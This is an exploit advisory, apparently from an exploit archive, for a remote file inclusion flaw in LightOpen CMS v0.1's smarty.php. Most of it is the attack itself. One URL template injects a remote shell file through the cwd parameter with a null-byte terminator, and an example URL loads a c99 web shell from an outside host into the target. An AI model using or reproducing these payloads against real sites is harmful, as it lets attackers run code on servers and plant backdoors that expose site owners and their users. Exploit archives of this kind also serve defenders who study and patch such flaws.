id: 10603
date: 01/04/2010
title: LightOpen CMS Remote File Inclusion (smarty.php)
author: Zer0 Thunder
cves: 

================================================
LightOpen CMS Remote File Inclusion (smarty.php) 
================================================

# Exploit Title: LightOpen CMS Remote File Inclusion (smarty.php)
# Date: 2010-01-05
# Author: Zer0 Thunder
# Software Link: http://sourceforge.net/projects/lightopencms/
# Version: v0.1
# Tested on: Windows XP sp2 [Wamp]
# CVE :
# Code :
 
Exploit :
http://site.com/path/smarty.php?cwd=[shell.txt]?%00
 
 
Example :
http://localhost/locms/smarty.php?cwd=http://www.cfsm.cn/c99.txt?%00
 
########################################



#  0day.today [2023-03-24]  #